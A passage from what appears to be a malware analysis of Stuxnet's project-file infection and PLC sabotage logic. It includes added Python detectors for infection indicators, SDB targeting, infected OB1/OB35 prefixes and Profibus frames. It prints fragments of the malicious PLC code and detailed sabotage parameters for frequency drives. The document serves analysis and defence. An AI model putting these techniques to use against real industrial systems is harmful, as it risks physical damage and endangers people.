   • GracS\cc_alg.sav xutils\listen\s7000001.mdx (an encoded, updated version of the Stuxnet configuration data block)
2. A copy of resource 203 is then decrypted and dropped to GracS\cc_tlg7.sav. This file is a Microsoft Cabinet file containing a DLL used to load and execute Stuxnet.
During this infection process, the WinCC database may be accessed and infections spread to the WinCC database server machine. This routine is described in the Network Spreading section.

TMP files
For every .tmp file found inside the project, the filename is first validated. It must be in the form ~WRxxxxx.tmp, where ‘xxxxx’ consists of hexadecimal digits whose sum modulo 16 is zero. For instance, ~WR12346.tmp would qualify because 1+2+3+4+6 = 16 = 0 mod 16.

The file content is then examined. The first eight bytes must contain the following “magic string”: ‘LRW~LRW~’.
If so, the rest of the data is decrypted. It should be a Windows module, which is then mapped. Export #7 of this
module is executed.

Stuxnet can also harness infected projects to update itself. If a project is opened and it is already infected, Stuxnet verifies if the version inside is newer than the current infection and executes it. This allows Stuxnet to update itself to newer versions when possible.

Three possible forms of infected project files exist. A different export handles each form.

Export 9 takes a Step7 project path as input, supposedly infected. It will then build paths to the following Stux-
net files located inside the project:
• …\XUTILS\listen\XR000000.MDX
• …\XUTILS\links\S7P00001.DBF
• …\XUTILS\listen\S7000001.MDX
These files are copied to temporary files (%Temp%\~dfXXXX.tmp) and Export 16, the main entry point within
this potentially newer version of Stuxnet, is executed.


Export 31 takes a Step7 project path as input, supposedly infected. It will then build paths to the following Stuxnet files located inside the project:
• …\GracS\cc_alg.sav
• …\GracS\db_log.sav
• …\GracS\cc_tag.sav
These files are copied to temporary files (%Temp%\~dfXXXX.tmp). Export #16 within these files is then called to
run this version of Stuxnet.

Export 10 is similar to 9 and 31. It can process Step7 folders and extract Stuxnet files located in the Gracs\ or
Xutils\ subfolders. It may also process Zip archives.

Export #16 within the extracted files is then used to run the extracted copy of Stuxnet, and eventually update
the configuration data block.
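As an added example that is not part of the dossier, the following Python gathers the project-level indicators from the S7P, MCP and TMP subsections into one scanner: it looks for the dropped xutils\ and GracS\ files, applies the ~WRxxxxx.tmp hex-digit rule, and checks the LRW~LRW~ magic. The project tree it scans is constructed in a temporary directory by `build_sample_project`; path case follows the lowercase spellings used in the S7P and MCP subsections, and `scan_project` and `wr_name_qualifies` are this example's own names.

```python
# Added example (not from the dossier): scan a Step 7 / WinCC project folder
# for the on-disk indicators of project infection described in the text.
import os
import re
import tempfile

# Relative paths the text says are created inside an infected project
# (both the xutils\ set from the S7P case and the GracS\ set from the MCP case).
DROPPED_FILES = [
    os.path.join("xutils", "listen", "xr000000.mdx"),
    os.path.join("xutils", "links", "s7p00001.dbf"),
    os.path.join("xutils", "listen", "s7000001.mdx"),
    os.path.join("GracS", "cc_alg.sav"),
    os.path.join("GracS", "db_log.sav"),
    os.path.join("GracS", "cc_tlg7.sav"),
    os.path.join("GracS", "cc_tag.sav"),
]
WR_TMP = re.compile(r"^~WR([0-9A-Fa-f]{5})\.tmp$", re.IGNORECASE)
TMP_MAGIC = b"LRW~LRW~"      # first eight bytes of a loader .tmp file


def wr_name_qualifies(name: str) -> bool:
    """~WRxxxxx.tmp with five hex digits whose sum is 0 mod 16."""
    m = WR_TMP.match(name)
    return bool(m) and sum(int(c, 16) for c in m.group(1)) % 16 == 0


def scan_project(project_dir: str) -> dict:
    """Report which dropped files exist and which qualifying .tmp files
    carry the magic string. NTFS is case-insensitive; on a case-sensitive
    filesystem an image copied with different case would need both spellings."""
    present = [p for p in DROPPED_FILES
               if os.path.isfile(os.path.join(project_dir, p))]
    loader_tmps = []
    for root, _dirs, files in os.walk(project_dir):
        for f in files:
            if not wr_name_qualifies(f):
                continue
            full = os.path.join(root, f)
            with open(full, "rb") as fh:
                if fh.read(8) == TMP_MAGIC:
                    loader_tmps.append(os.path.relpath(full, project_dir))
    return {
        "dropped_present": present,
        "loader_tmps": loader_tmps,
        "suspicious": bool(present or loader_tmps),
    }


def build_sample_project(infected: bool) -> str:
    """Create a constructed project tree in a temp dir and return its path."""
    d = tempfile.mkdtemp(prefix="s7proj_")
    os.makedirs(os.path.join(d, "hOmSave7", "sub"), exist_ok=True)
    with open(os.path.join(d, "project.s7p"), "wb") as f:
        f.write(b"dummy project")
    if infected:
        for rel in DROPPED_FILES[:3]:                  # the xutils\ set
            os.makedirs(os.path.dirname(os.path.join(d, rel)), exist_ok=True)
            with open(os.path.join(d, rel), "wb") as f:
                f.write(b"encrypted blob (constructed)")
        with open(os.path.join(d, "~WR12346.tmp"), "wb") as f:   # 1+2+3+4+6 = 16
            f.write(TMP_MAGIC + b"payload")
        with open(os.path.join(d, "~WR12345.tmp"), "wb") as f:   # sum 15 -> ignored
            f.write(TMP_MAGIC + b"payload")
    return d


if __name__ == "__main__":
    print(scan_project(build_sample_project(True)))
    print(scan_project(build_sample_project(False)))
```

The scan deliberately mirrors the malware's own acceptance rule for .tmp names, so a file the loader would execute is exactly a file the scanner reports; a ~WR file that fails the digit rule is ignored by both.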


Modifying PLCs
Resource 208 is dropped by export #17 and is a malicious replacement for Simatic’s s7otbxdx.dll file.

First, it’s worth remembering that the end goal of Stuxnet is to infect specific types of Simatic programmable
logic controller (PLC) devices. PLC devices are loaded with blocks of code and data written using a variety of
languages, such as STL or SCL. The compiled code is an assembly called MC7. These blocks are then run by
the PLC, in order to execute, control, and monitor an industrial process.

The original s7otbxdx.dll is responsible for handling PLC block exchange between the programming device
(i.e., a computer running a Simatic manager on Windows) and the PLC. By replacing this .dll file with its own,
Stuxnet is able to perform the following actions:
• Monitor PLC blocks being written to and read from the PLC.
• Infect a PLC by inserting its own blocks and replacing or infecting existing blocks.
• Mask the fact that a PLC is infected.
Figure 19: PLC and Step7

Simatic PLC 101

To access a PLC, specific software needs to be installed. Stuxnet specifically targets the WinCC/Step 7 software.

With this software installed, the programmer can connect to the PLC with a data cable and access the memory contents, reconfigure it, download a program onto it, or debug previously loaded code. Once the PLC has been configured and programmed, the Windows computer can be disconnected and the PLC will function by itself. To give you an idea of what this looks like, figure 20 is a photo of some basic test equipment.

Figure 20: Test equipment


Figure 21 shows a portion of Stuxnet’s malicious code in the Step7 STL editor. The beginning of the MC7 code for one of Stuxnet’s Function Code (FC) blocks is visible. The code shown is from the disassembled block FC1873.

Figure 21: Stuxnet code in the Step7 STL editor

As mentioned previously, the Step 7 software uses a library file called s7otbxdx.dll to perform the actual communication with the PLC. The Step7 program calls different routines in this .dll file when it wants to access the PLC. For example, if a block of code is to be read from the PLC using Step7, the routine s7blk_read is called. The code in s7otbxdx.dll accesses the PLC, reads the code, and passes it back to the Step7 program, as shown in figure 22.

Figure 22: Step7 and PLC communicating via s7otbxdx.dll

Looking at how access to the PLC works when Stuxnet is installed, once Stuxnet executes, it renames the original s7otbxdx.dll file to s7otbxsx.dll. It then replaces the original .dll file with its own version. Stuxnet can now intercept any call that is made to access the PLC from any software package.


Stuxnet’s s7otbxdx.dll file contains all potential exports of the original .dll file – a maximum of 109 – which allows it to handle all the same requests. The majority of these exports are simply forwarded to the real .dll file, now called s7otbxsx.dll, and nothing untoward happens. In fact, 93 of the original 109 exports are dealt with in this manner. The trick, however, lies in the 16 exports that are not simply forwarded but are instead intercepted by the custom .dll file. The intercepted exports are the routines to read, write, and enumerate code blocks on the PLC, among others. By intercepting these requests, Stuxnet is able to modify the data sent to or returned from the PLC without the operator of the PLC realizing it. It is also through these routines that Stuxnet is able to hide the malicious code that is on the PLC.

Figure 23: Communication with malicious version of s7otbxdx.dll

The following are the most common types of blocks used by a PLC:
• Data Blocks (DB) contain program-specific data, such as numbers, structures, and so on.
• System Data Blocks (SDB) contain information about how the PLC is configured. They are created depending on the number and type of hardware modules that are connected to the PLC.
• Organization Blocks (OB) are the entry point of programs. They are executed cyclically by the CPU. In regards to Stuxnet, two notable OBs are:
  • OB1 is the main entry-point of the PLC program. It is executed cyclically, without specific time requirements.
  • OB35 is a standard watchdog Organization Block, executed by the system every 100 ms. This function may contain any logic that needs to monitor critical input in order to respond immediately or perform functions in a time critical manner.
• Function Blocks (FC) are standard code blocks. They contain the code to be executed by the PLC. Generally, the OB1 block references at least one FC block.

The infection process

Stuxnet infects PLCs with different code depending on the characteristics of the target system. An infection sequence consists of code blocks and data blocks that will be injected into the PLC to alter its behavior. The threat contains three main infection sequences. Two of these sequences are very similar, and functionally equivalent. These two sequences are dubbed A and B. The third sequence is dubbed sequence C.

Initially, if the DLL is running inside the ccrtsloader.exe file, the malicious s7otbxdx.dll starts two threads responsible for infecting a specific type of PLC:
• The first thread runs an infection routine every 15 minutes. The targeted PLC information has previously been collected by the hooked exports, mainly s7db_open(). This infection routine specifically targets CPUs 6ES7-315-2 (series 300) with special SDB characteristics. The sequence of infection is A or B.
• The second thread regularly queries the PLC for a specific block that was injected by the first thread if the infection process succeeded. This block is customized, and it impacts the way sequences A or B run on the infected PLC.
Finally, the injection of sequence C appears disabled or was only partially completed. Sequence C can be written only to the 6ES7-417 family, not the 6ES7-315-2 family mentioned above.


The infection thread, sequences A and B


This thread runs the infection routine every 15 minutes. When a PLC is “found”, the following steps are executed:
• First, the PLC type is checked using the s7ag_read_szl API. It must be a PLC of type 6ES7-315-2.
• The SDB blocks are checked to determine whether the PLC should be infected and if so, with which sequence
(A or B).
• If the two steps above passed, the real infection process starts. The DP_RECV block is copied to FC1869, and
then replaced by a malicious block embedded in Stuxnet.
• The malicious blocks of the selected infection sequence are written to the PLC.
• OB1 is infected so that the malicious code sequence is executed at the start of a cycle.
• OB35 is also infected. It acts as a watchdog, and on certain conditions, it can stop the execution of OB1.
The three key steps of the infection process are detailed below.

SDB check
The System Data Blocks are enumerated and parsed. Stuxnet must find an SDB with the DWORD at offset 50h equal to 0100CB2Ch. This specifies the system uses the Profibus communications processor module CP 342-5. Profibus is a standard industrial network bus used for distributed I/O. In addition, specific values are searched for and counted: 7050h and 9500h. The SDB check passes if, and only if, the total number of values found is equal to or greater than 33. These appear to be Profibus identification numbers, which are required for all Profibus DP devices except Master Class 2 devices. Identification numbers are assigned to manufacturers by Profibus & Profinet International (PI) for each device type they manufacture. 7050h is assigned to part number KFC750V3 which appears to be a frequency converter drive (also known as variable frequency drive) manufactured by Fararo Paya in Teheran, Iran. 9500h is assigned to Vacon NX frequency converter drives manufactured by Vacon based in Finland.

Frequency converter drives are used to control the speed of another device, such as a motor. For example, if the frequency is increased, the speed of the motor increases. Frequency converter drives are used in multiple industrial control industries including water systems, HVAC, gas pipelines, and other facilities.

Thus, the targeted system is using Profibus to communicate with at least 33 frequency converter drives from one
or both of the two manufacturers, where sequence A is chosen if more Vacon devices are present and sequence
B is chosen if more Fararo Paya devices are present.
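The SDB profile described above can be turned into a configuration triage check: does a given PLC's SDB match the marker and drive-count criteria Stuxnet tested for, and which sequence would it have received? The Python below is an added example written for this page, not Symantec's or Stuxnet's code. It assumes the block is scanned as consecutive big-endian 16-bit words and that a tie between the two drive counts selects sequence B; the dossier states neither, and the sample SDB image is constructed for the example.

```python
import struct
from collections import Counter
from typing import Optional

# Constants taken from the SDB check described in the dossier.
MARKER_OFFSET = 0x50                 # DWORD at offset 50h ...
CP_342_5_MARKER = 0x0100CB2C         # ... must equal 0100CB2Ch (CP 342-5 present)
PROFIBUS_ID_FARARO_PAYA = 0x7050     # KFC750V3 frequency converter drive
PROFIBUS_ID_VACON = 0x9500           # Vacon NX frequency converter drive
MIN_DRIVE_COUNT = 33                 # total ident numbers needed to pass


def count_profibus_ids(sdb: bytes) -> Counter:
    """Count the two Profibus ident numbers in an SDB image.

    Assumption (the dossier does not say how the block is scanned): the
    block is read as consecutive big-endian 16-bit words, the byte order
    S7 PLCs use for block data.
    """
    counts = Counter()
    for off in range(0, len(sdb) - 1, 2):
        word = struct.unpack_from(">H", sdb, off)[0]
        if word in (PROFIBUS_ID_FARARO_PAYA, PROFIBUS_ID_VACON):
            counts[word] += 1
    return counts


def evaluate_sdb(sdb: bytes) -> Optional[str]:
    """Return None when the SDB does not match Stuxnet's targeting profile,
    otherwise the infection sequence that would be chosen ('A' or 'B')."""
    if len(sdb) < MARKER_OFFSET + 4:
        return None
    marker = struct.unpack_from(">I", sdb, MARKER_OFFSET)[0]
    if marker != CP_342_5_MARKER:
        return None                      # no CP 342-5 module configured
    counts = count_profibus_ids(sdb)
    vacon = counts[PROFIBUS_ID_VACON]
    fararo = counts[PROFIBUS_ID_FARARO_PAYA]
    if vacon + fararo < MIN_DRIVE_COUNT:
        return None                      # fewer than 33 matching drives
    # A if more Vacon devices, B if more Fararo Paya devices; the dossier
    # does not say what happens on a tie, so a tie is treated as B here.
    return "A" if vacon > fararo else "B"


def build_sample_sdb(vacon: int, fararo: int) -> bytes:
    """Construct a synthetic SDB image (test data made up for this
    example, not a dump of a real block)."""
    body = bytearray(MARKER_OFFSET)      # zero padding up to the marker
    body += struct.pack(">I", CP_342_5_MARKER)
    body += struct.pack(">H", PROFIBUS_ID_VACON) * vacon
    body += struct.pack(">H", PROFIBUS_ID_FARARO_PAYA) * fararo
    return bytes(body)


if __name__ == "__main__":
    for v, f in ((20, 13), (10, 23), (20, 12)):
        print(f"vacon={v} fararo={f} -> {evaluate_sdb(build_sample_sdb(v, f))}")
```

Run against real SDB exports, a `None` result means the configuration is outside the profile the dossier describes; an `'A'` or `'B'` result says only that the profile matches, not that the PLC is infected.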

DP_RECV replacement
DP_RECV is the name of a standard function block used by network coprocessors. It is used to receive network frames on the Profibus – a standard industrial network bus used for distributed I/O. The original block is copied to FC1869, and then replaced by a malicious block. Each time the function is used to receive a packet, the malicious Stuxnet block takes control: it will call the original DP_RECV in FC1869 and then do post-processing on the packet data.

OB1/OB35 infection
Stuxnet uses a simple code-prepending infection technique to infect Organization Blocks. For example, the following sequence of actions is performed when OB1 is infected:
• Increase the size of the original block.
• Write malicious code to the beginning of the block.
• Insert the original OB1 code after the malicious code.
Figure 24 illustrates OB1 before and after infection.

Figure 24

OB1 before and after infection


Sequence blocks
Sequences A and B are extremely close and functionally equivalent. They consist of 17 blocks, the malicious
DP_RECV replacement block, as well as the infected OB1 and OB35 blocks. Figure 25 shows the connections
between the blocks.
Figure 25

Connections Between Blocks, Sequences A and B

Legend:
• Arrows between two code blocks mean that a block calls or executes another block.
• The pink block represents the main block, called from the infected OB1.
• White blocks are standard Stuxnet code blocks.
• Yellow blocks are also Stuxnet blocks, but copied from the Simatic library of standard blocks. They execute common functions, such as timestamp comparison.
• Gray blocks are not part of Stuxnet; they’re system function blocks, part of the operating system running on the PLC. They’re used to execute system
tasks, such as reading the system clock (SFC1).
• Green blocks represent Stuxnet data blocks.

Note that block names are misleading (except for the yellow and gray blocks), in the sense that they do not reflect the real purpose of the block.

Sequences A and B intercept packets on the Profibus by using the DP_RECV hooking block. Based on the values
found in these blocks, other packets are generated and sent on the wire. This is controlled by a complex state
machine, implemented in the various code blocks that make the sequence. One can recognize an infected PLC in
a clean environment by examining blocks OB1 and OB35. The infected OB1 starts with the following instructions,
meant to start the infection sequence and potentially short-circuit OB1 execution on specific conditions:

UC FC1865
POP
L DW#16#DEADF007
==D
BEC
L DW#16#0
L DW#16#0


The infected OB35 starts with the following instructions, meant to short-circuit OB35 on specific conditions:

UC FC1874
POP
L DW#16#DEADF007
==D
BEC
L DW#16#0
L DW#16#0
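Since the dossier says an infected PLC can be recognized in a clean environment by the instructions at the head of OB1 and OB35, a block dump can be checked for exactly those prefixes. The script below is an added example written for this page (not part of the dossier) that matches the two listings above against STL text; the sample listings are constructed, with made-up program logic following the prefix.

```python
from typing import List, Optional

# Leading instructions the dossier reports for the infected blocks; the two
# prefixes differ only in the function block that is called.
INFECTED_PREFIXES = {
    "OB1":  ["UC FC1865", "POP", "L DW#16#DEADF007", "==D", "BEC"],
    "OB35": ["UC FC1874", "POP", "L DW#16#DEADF007", "==D", "BEC"],
}
MAGIC_MARKER = "DW#16#DEADF007"


def normalize_stl(text: str) -> List[str]:
    """Turn an STL listing into a list of instructions: drop blank lines
    and '//' comments, collapse whitespace, and uppercase everything."""
    instrs = []
    for line in text.splitlines():
        code = line.split("//", 1)[0].strip()
        if code:
            instrs.append(" ".join(code.split()).upper())
    return instrs


def classify_block(stl_text: str) -> Optional[str]:
    """Return 'OB1' or 'OB35' if the listing starts with the corresponding
    Stuxnet prefix, otherwise None."""
    instrs = normalize_stl(stl_text)
    for name, prefix in INFECTED_PREFIXES.items():
        if instrs[: len(prefix)] == prefix:
            return name
    return None


def has_magic_marker(stl_text: str) -> bool:
    """Weaker indicator: the DEADF007 constant anywhere in the block."""
    return any(MAGIC_MARKER in instr for instr in normalize_stl(stl_text))


# Constructed sample listings (not real block dumps). The infected ones
# reproduce the prefix from the dossier followed by made-up original logic.
SAMPLE_INFECTED_OB1 = """
      UC    FC1865
      POP
      L     DW#16#DEADF007
      ==D
      BEC
      L     DW#16#0
      L     DW#16#0
      // original program follows
      A     I 0.0
      =     Q 4.0
"""
SAMPLE_INFECTED_OB35 = SAMPLE_INFECTED_OB1.replace("FC1865", "FC1874")
SAMPLE_CLEAN_OB1 = """
      // plain cyclic program
      A     I 0.0
      =     Q 4.0
"""

if __name__ == "__main__":
    for label, sample in (("infected OB1", SAMPLE_INFECTED_OB1),
                          ("infected OB35", SAMPLE_INFECTED_OB35),
                          ("clean OB1", SAMPLE_CLEAN_OB1)):
        print(f"{label}: {classify_block(sample)}")
```

The listing has to come from a clean engineering station or an offline block export: as the rootkit section below explains, the hooked s7blk_read on an infected station returns a disinfected copy of OB1 and OB35, so a scan run through the malicious s7otbxdx.dll sees nothing.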

The monitor thread


This secondary thread is used to monitor a data block DB890 of sequence A or B. Though constantly running
and probing this block (every 5 minutes), this thread has no purpose if the PLC is not infected. The purpose of
the thread is to monitor each S7-315 on the bus. When the sabotage routine is begun, the thread writes to the
DB890 block of all the other S7-315s on the bus in order to have them begin the sabotage routine as well. This
thread causes the attack to begin almost simultaneously for all S7-315 devices on the same bus.

Behavior of a PLC infected by sequence A/B


Infection sequences A and B are very similar. Unless otherwise stated, what’s mentioned here applies to both sequences. The infection code for a 315-2 is organized as follows:
• The replaced DP_RECV block (later on referred to as the “DP_RECV monitor”) is meant to monitor data sent by the frequency converter drives to the 315-2 CPU via CP 342-5 Profibus communication modules.
  • Up to 6 CP 342-5 Profibus communication modules are supported. Each is a master on its own Profibus subnet with 31 frequency converter drives as slaves. The addresses of the CP 342-5 modules are recorded. Note the 315-2 CPU documentation recommends no more than 4 CP 342-5 modules, but in theory can support more, depending on CPU performance.
  • Frames sent over Profibus are inspected. They are expected to have a specific format. Each frame should have 31 records—one for each slave—of either 28 or 32 bytes as the format differs slightly for the two different frequency converter drives. Some fields are stored.
• The other blocks implement a state machine that controls the process. Transitions from state i to state i+1 are based on events, timers or task completions.
  • In state 1 fields recorded by the DP_RECV monitor are examined to determine if the target system is in a particular state of operation. When enough fields match simple criteria, a transition to state 2 occurs.
  • In state 2 a timer is started. Transitioning to state 3 occurs after two hours have elapsed.
  • In states 3 and 4, network frames are generated and sent on the Profibus to DP slaves. The contents of these frames are semi-fixed, and partially depend on what has been recorded by the DP_RECV monitor.
  • State 5 initiates a reset of various variables used by the infection sequence (not to be confused with a PLC reset), before transitioning to state 1. Transitioning to state 0 may also occur in case of errors.
  • In state 0, a 5-hour timer is started.
Figure 29 represents a simplified view of this state machine.

The normal path of execution is 1-2-3-4-5-1 – as shown by the solid, blue arrows in the diagram. Let’s detail what happens during each state.

The initial state is 1 (circled in red). Transitioning to state 2 can take a fair amount of time. The code specifically monitors for records within the frames sent from the frequency converter drives that contain the current operating frequency (speed of the device being controlled). This value is held at offset 0xC in each record in the frame and is referred to as PD1 (parameter data 1). The frequency values can be represented in hertz (Hz) or decihertz (deciHz). The attackers expect the frequency drives to be running between 807 Hz and 1210 Hz. If PD1 has a value greater than 1210, the code assumes the values being sent are represented in deciHertz and adjusts all frequency values by a factor of 10. For example 10000 would be considered 10,000 deciHertz (1000.0 Hz) rather than 10,000 Hz. The routine that counts these records (hereafter referred to as events) is called once per minute.


Events are counted with a cap of 60 per minute. It seems that this is the optimal, expected rate of events. The global event counter, initially set to 1,187,136, must reach 2,299,104 to initiate a transition to state 2. If we assume an optimal number of events set to 60 (the max could be 186, but remember the cap), the counting being triggered every minute, the transition occurs after (2299104-1187136)/60 minutes, which is 12.8 days.

Transitioning from state 2 to 3 is a matter of waiting 2 hours.


Figure 26

State machine path of execution

In states 3 and 4 two network send bursts occur. The traffic generated is semi-fixed, and can be one of the two
sequences. The sequences consist of multiple frames that each contain 31 records. Each frame is sent to each
CP 342-5 module, which passes on the respective record within the frame to each of the 31 frequency converter
drive slaves.

For infection sequence A (for Vacon frequency converters):
• Sequence 1 consists of 147 frames:
  • 145 frames for sub-sequence 1a, sent during state 3.
  • 2 frames for sub-sequence 1b, sent during state 4.
• Sequence 2 consists of 163 frames:
  • 127 frames for sub-sequence 2a, sent during state 3.
  • 36 frames for sub-sequence 2b, sent during state 4.
For infection sequence B (for Fararo Paya frequency converters):
• Sequence 1 consists of 57 frames:
  • 34 frames for sub-sequence 1a, sent during state 3.
  • 23 frames for sub-sequence 1b, sent during state 4.
• Sequence 2 consists of 59 frames:
  • 32 frames for sub-sequence 2a, sent during state 3.
  • 27 frames for sub-sequence 2b, sent during state 4.
Transitioning from state 3 to state 4 takes 15 minutes for sequence 1 and 50 minutes for sequence 2.

The data in the frames are instructions for the frequency converter drives. For example one of the frames contains records that change the maximum frequency (the speed at which the motor will operate). The frequency converter drives consist of parameters, which can be remotely configured via Profibus. One can write new values to these parameters changing the behavior of the device. The values written to the devices can be found in Appendix C.

Of note, for sequence A, the maximum frequency is set to 1410 Hz in sequence 1a, then set to 2 Hz in sequence
2a, and then set to 1064 Hz in sequence 2b. Thus, the speed of the motor is changed from 1410Hz to 2Hz to
1064Hz and then over again. Recall the normal operating frequency at this time is supposed to be between 807
Hz and 1210 Hz.

Thus, Stuxnet sabotages the system by slowing down or speeding up the motor to different rates at different
times.

When a network send (done through the DP_SEND primitive) error occurs, up to two more attempts to resend the
frame will be made. Cases where a slave coprocessor is not started are also gracefully handled through the use
of timers.

During states 3 and 4, the execution of the original code in OB1 and OB35 is temporarily halted by Stuxnet. This
is likely used to prevent interference from the normal mode of operation while Stuxnet sends its own frames.

During processing of state 5, various fields are initialized before transitioning to state 1 and starting a new cycle.
The two major events are:
• The global event counter is reset (which was initially 1187136). This means that future transitions from state 1
to state 2 should take about 26.6 days.
• The DP_RECV monitor is reset. This means that the slave reconnaissance process is to take place again before
frame snooping occurs. (Incidentally, note that slave reconnaissance is forced every 5.5 hours.)
Transition to state 0 then occurs if an error was reported. “Error” in this context usually means that OB1 took too
long to execute (over 13 seconds). Otherwise, a regular transition to state 1 takes place.

It is worth mentioning that short-circuits, used to transition directly through states 0 and 1 to state 3, are designed to allow the sabotage routine to begin immediately. This occurs when another S7-315 on the same bus has fulfilled the wait period. The Windows monitoring thread will modify DB890, setting a flag, causing the PLC code to immediately begin the sabotage routine and to no longer wait the requisite time. This behavior synchronizes the sabotage routine across all 315s controlled by the same Windows system.

Let’s detail the purpose of the DP_RECV monitor and the subsequent frames sent during states 3 and 4. The code expects a structure of 31 records of either 28 or 32 bytes (depending on which frequency drive is installed). Here’s the header of such a record:

Offset  Type   Name
0       word   ID
2       word   Index (IND)
4       dword  VALUE
8       word   ControlWord (CW)/StatusWord (SW)
10      word   Reference (REF)/Actual (ACT)
12      word   Process Data 1 (PD1)

The monitor is especially interested in fields SW, ACT, and PD1. The following pieces of information are recorded:
• Is the tenth bit in SW set? This specifies FieldBus Control is on (one can control the devices via Profibus).
• Is ACT a positive or negative integer? Positive represents a forward direction, while negative reverse direction.
• The value of PD1, which is the output frequency (the current frequency/speed).
The other fields are ignored.

When reaching states 3 and 4, the original PLC code is halted and the malicious PLC code begins sending frames
of data based on the recorded values during the DP_RECV monitor phase. The purpose of sending the frames is
to change the behavior of the frequency converter drives. First of all DP_SEND will send similar types of frames
as the ones that are expected to be received by DP_RECV (which means each frame will contain 31 records of 28
or 32 bytes—one record for each slave frequency converter drive). Each record sent changes a configuration,
such as the maximum frequency on the frequency converter drive. The record fields will be set to zero, except for
the ID, Value, CW, and REF fields.
Table 6

ID Field Format

ID Byte 1 (bits 15-8), ID Byte 2 (bits 7-0)
15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
Request Type | SM | Parameter Number

• ID specifies the parameter to change. The format of the ID field is detailed in Table 6.
• VALUE contains the new value for the particular parameter. For frequency values, a factor of ten can be applied if the system was determined to be using deciHz units.
• CW (ControlWord) in sequence A is typically set to 47Fh, which means ‘Run’, but can start by sending 477h (Stop by Coast) and finishes by using 4FFh (Fault Reset). CW in sequence B is set to 403h.
• REF can range from 100% to -100% represented by 10000 or -10000. This specifies the drive should be operating at the maximum (100%) frequency either in a forward (positive 10000) or reverse (negative 10000) direction. The previous direction, before the behavior of the frequency converter drives were hijacked, is maintained, but at 100% potentially with a new maximum frequency.
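The record header table, the three facts the DP_RECV monitor keeps per slave, the Table 6 ID layout, the deciHz heuristic and the event-counter arithmetic (12.8 days initially, 26.6 days after a reset) above all describe one data path, so they are covered by a single worked example. The Python below is an added example written for this page, not Symantec's or Stuxnet's code; it parses a constructed 31-record frame and reproduces those checks. Assumptions the dossier does not state: the fields are big-endian, "tenth bit" of SW means bit 9 counting from bit 0, and the ID field splits as 4-bit request type, 1-bit SM and 11-bit parameter number (the PROFIdrive PKE layout).

```python
import struct
from dataclasses import dataclass
from typing import List

RECORDS_PER_FRAME = 31
RECORD_SIZES = (28, 32)                # depends on the drive model
# Record header from the offset table above; big-endian is an assumption.
HEADER = struct.Struct(">HHIHHH")      # ID, IND, VALUE, CW/SW, REF/ACT, PD1
FREQ_LOW_HZ, FREQ_HIGH_HZ = 807, 1210  # expected operating window
DECIHZ_THRESHOLD = 1210                # PD1 above this is taken as deciHz
FIELDBUS_CONTROL_BIT = 1 << 9          # "tenth bit" of SW, bit 9 (assumption)
EVENTS_PER_MINUTE_CAP = 60
EVENT_COUNTER_INITIAL = 1_187_136
EVENT_COUNTER_TARGET = 2_299_104


@dataclass
class DriveRecord:
    ident: int
    index: int
    value: int
    status_word: int
    actual: int        # signed; the sign gives the direction of rotation
    pd1: int


def decode_id(ident: int):
    """Split the ID field of Table 6 into (request type, SM, parameter
    number). Field widths are an assumption based on the PROFIdrive PKE
    layout: 4 bits, 1 bit, 11 bits."""
    return (ident >> 12) & 0xF, (ident >> 11) & 1, ident & 0x7FF


def parse_frame(frame: bytes, record_size: int) -> List[DriveRecord]:
    """Split one DP_RECV frame into its 31 per-slave records."""
    if record_size not in RECORD_SIZES:
        raise ValueError("record size must be 28 or 32 bytes")
    if len(frame) != RECORDS_PER_FRAME * record_size:
        raise ValueError("frame must hold exactly 31 records")
    records = []
    for i in range(RECORDS_PER_FRAME):
        ident, ind, val, sw, act, pd1 = HEADER.unpack_from(frame, i * record_size)
        act = act - 0x10000 if act & 0x8000 else act   # 16-bit two's complement
        records.append(DriveRecord(ident, ind, val, sw, act, pd1))
    return records


def frequency_hz(pd1: int) -> float:
    """Apply the dossier's unit heuristic: PD1 > 1210 means deciHz."""
    return pd1 / 10.0 if pd1 > DECIHZ_THRESHOLD else float(pd1)


def monitor_snapshot(records: List[DriveRecord]) -> List[dict]:
    """The three facts the DP_RECV monitor records for each slave."""
    return [{"fieldbus_control": bool(r.status_word & FIELDBUS_CONTROL_BIT),
             "forward": r.actual >= 0,
             "frequency_hz": frequency_hz(r.pd1)} for r in records]


def count_events(records: List[DriveRecord]) -> int:
    """Records inside the 807-1210 Hz window seen this minute, capped at 60."""
    hits = sum(1 for r in records
               if FREQ_LOW_HZ <= frequency_hz(r.pd1) <= FREQ_HIGH_HZ)
    return min(hits, EVENTS_PER_MINUTE_CAP)


def days_to_state2(counter_start: int = EVENT_COUNTER_INITIAL,
                   events_per_minute: int = EVENTS_PER_MINUTE_CAP) -> float:
    """Minutes of counting needed to reach the threshold, expressed in days.
    counter_start=0 models the counter after the state 5 reset."""
    minutes = (EVENT_COUNTER_TARGET - counter_start) / events_per_minute
    return minutes / (60 * 24)


def build_sample_frame(pd1_values: List[int], record_size: int = 32,
                       reverse_slaves=()) -> bytes:
    """Constructed test frame (not captured traffic): 31 records whose
    status word has FieldBus Control set and whose ACT is +/-10000."""
    if len(pd1_values) != RECORDS_PER_FRAME:
        raise ValueError("need one PD1 value per slave")
    frame = bytearray()
    for slave, pd1 in enumerate(pd1_values):
        act = 0x10000 - 10000 if slave in reverse_slaves else 10000
        rec = HEADER.pack(0x6001, 0, 0, FIELDBUS_CONTROL_BIT, act, pd1)
        frame += rec.ljust(record_size, b"\x00")   # pad to the record size
    return bytes(frame)


if __name__ == "__main__":
    recs = parse_frame(build_sample_frame([10640] * 29 + [5000, 20000],
                                          reverse_slaves={30}), 32)
    print("events this minute:", count_events(recs))
    print("days to state 2:", round(days_to_state2(), 2),
          "after reset:", round(days_to_state2(counter_start=0), 2))
```

With every slave reporting 10640 (read as 1064.0 Hz) the frame contributes one event per slave; the two slaves reporting 5000 (500.0 Hz) and 20000 (2000.0 Hz) fall outside the window and are not counted.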
The parameters that are modified and their values are in Appendix C. To more clearly illustrate the behavior of the injected code, we’ve outlined the key events that would occur with an infected 315-2 CPU connected to multiple CP 342-5 modules each with 31 frequency converter drive slaves, as shown in the diagram below.

Figure 27

Connections between sequence blocks

• The PLC is infected.
• Frequency converter slaves send records to their CP-342-5 master, building a frame of 31 records. The CPU records the CP-342-5 addresses.
• The frames are examined and the fields are recorded.
• After approximately 13 days, enough events have been recorded, showing the system has been operating between 807 Hz and 1210 Hz.
• The infected PLC generates and sends sequence 1 to its frequency converter drives, setting the frequency to 1410Hz.
• Normal operation resumes.
• After approximately 27 days, enough events have been recorded.
• The infected PLC generates and sends sequence 2 to its frequency converter drives, setting the frequency initially to 2Hz and then 1064Hz.
• Normal operation resumes.
